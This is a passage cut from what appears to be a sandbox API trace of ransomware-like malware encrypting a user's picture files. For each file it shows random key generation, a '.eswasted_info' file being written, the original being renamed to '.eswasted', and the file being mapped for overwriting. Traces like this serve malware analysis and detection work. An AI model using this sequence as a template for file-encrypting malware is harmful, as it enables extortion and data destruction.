lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cP-uWR.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cp-uwr.bmp.eswasted")) returned 1 [0079.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cP-uWR.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cp-uwr.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.491] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.493] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.494] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.494] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.494] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.495] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.495] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.503] SetEndOfFile (hFile=0x130) returned 1 [0079.505] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.505] CloseHandle (hObject=0x130) returned 1 [0079.507] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.507] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.508] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.508] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.508] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cS-P6.jpg") returned 52 [0079.508] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x272) returned 0x6f5cc0 [0079.508] lstrcpyW (in: lpString1=0x6f5d28, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.508] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x721728 [0079.508] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.509] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x721728 | out: pbBuffer=0x721728) returned 1 [0079.509] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cS-P6.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cs-p6.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.510] WriteFile (in: hFile=0x130, lpBuffer=0x721728*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x721728*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.510] SetEndOfFile (hFile=0x130) returned 1 [0079.511] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.511] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.511] lstrcpyW (in: lpString1=0x6f5d28, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cS-P6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cs-p6.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cS-P6.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cs-p6.jpg.eswasted")) returned 1 [0079.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cS-P6.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cs-p6.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.512] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.512] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.513] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.513] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.513] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.514] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.514] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.522] SetEndOfFile (hFile=0x130) returned 1 [0079.524] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.524] CloseHandle (hObject=0x130) returned 1 [0079.526] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.526] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.527] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.527] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.527] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ed90HCCY6sye.gif") returned 59 [0079.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x280) returned 0x6f5cc0 [0079.527] lstrcpyW (in: lpString1=0x6f5d36, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x721728 [0079.528] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.528] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x721728 | out: pbBuffer=0x721728) returned 1 [0079.528] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ed90HCCY6sye.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ed90hccy6sye.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.529] WriteFile (in: hFile=0x130, lpBuffer=0x721728*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x721728*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.530] SetEndOfFile (hFile=0x130) returned 1 [0079.530] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.530] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.530] lstrcpyW (in: lpString1=0x6f5d36, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.530] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ed90HCCY6sye.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ed90hccy6sye.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ed90HCCY6sye.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ed90hccy6sye.gif.eswasted")) returned 1 [0079.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ed90HCCY6sye.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ed90hccy6sye.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.531] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.532] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f0e0) returned 1 [0079.628] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.628] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.628] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f0e0) returned 1 [0079.629] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.629] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0079.637] SetEndOfFile (hFile=0x130) returned 1 [0079.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.660] CloseHandle (hObject=0x130) returned 1 [0079.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.663] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.664] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.664] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.664] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g9 yknXI2nhDGav.gif") returned 62 [0079.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x286) returned 0x6f5cc0 [0079.664] lstrcpyW (in: lpString1=0x6f5d3c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.664] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.665] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.665] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.665] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g9 yknXI2nhDGav.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g9 yknxi2nhdgav.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.666] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.667] SetEndOfFile (hFile=0x130) returned 1 [0079.667] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.667] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.667] lstrcpyW (in: lpString1=0x6f5d3c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.667] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g9 yknXI2nhDGav.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g9 yknxi2nhdgav.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g9 yknXI2nhDGav.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g9 yknxi2nhdgav.gif.eswasted")) returned 1 [0079.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g9 yknXI2nhDGav.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g9 yknxi2nhdgav.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.668] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.668] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.669] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.669] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.669] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.670] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.670] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.678] SetEndOfFile (hFile=0x130) returned 1 [0079.681] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.681] CloseHandle (hObject=0x130) returned 1 [0079.682] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.682] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.683] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.683] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.683] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gjxB.png") returned 51 [0079.683] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x270) returned 0x6f5cc0 [0079.683] lstrcpyW (in: lpString1=0x6f5d26, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.683] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.683] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.684] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.684] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gjxB.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gjxb.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.685] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.686] SetEndOfFile (hFile=0x130) returned 1 [0079.686] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.686] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.686] lstrcpyW (in: lpString1=0x6f5d26, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gjxB.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gjxb.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gjxB.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gjxb.png.eswasted")) returned 1 [0079.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gjxB.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gjxb.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.687] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.688] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.722] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.722] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.722] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.723] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.723] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.732] SetEndOfFile (hFile=0x130) returned 1 [0079.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.734] CloseHandle (hObject=0x130) returned 1 [0079.736] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.736] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.737] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.737] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.737] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\6Z2Sq6dDRPMBKJphJXK.jpg") returned 80 [0079.737] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2aa) returned 0x6f65b8 [0079.737] lstrcpyW (in: lpString1=0x6f6658, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.737] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0079.737] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.738] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0079.738] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.738] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\6Z2Sq6dDRPMBKJphJXK.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\6z2sq6ddrpmbkjphjxk.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.738] WriteFile (in: hFile=0x130, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.739] SetEndOfFile (hFile=0x130) returned 1 [0079.740] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.740] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.740] lstrcpyW (in: lpString1=0x6f6658, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.740] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\6Z2Sq6dDRPMBKJphJXK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\6z2sq6ddrpmbkjphjxk.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\6Z2Sq6dDRPMBKJphJXK.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\6z2sq6ddrpmbkjphjxk.jpg.eswasted")) returned 1 [0079.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\6Z2Sq6dDRPMBKJphJXK.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\6z2sq6ddrpmbkjphjxk.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.741] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.743] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.744] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.744] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.744] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.745] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.745] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.753] SetEndOfFile (hFile=0x130) returned 1 [0079.756] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.756] CloseHandle (hObject=0x130) returned 1 [0079.757] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0079.757] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.758] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.758] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.758] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\87YzhV.png") returned 67 [0079.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x290) returned 0x6f5cc0 [0079.758] lstrcpyW (in: lpString1=0x6f5d46, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0079.758] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.759] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0079.759] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\87YzhV.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\87yzhv.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.760] WriteFile (in: hFile=0x130, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.761] SetEndOfFile (hFile=0x130) returned 1 [0079.761] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.761] lstrcpyW (in: 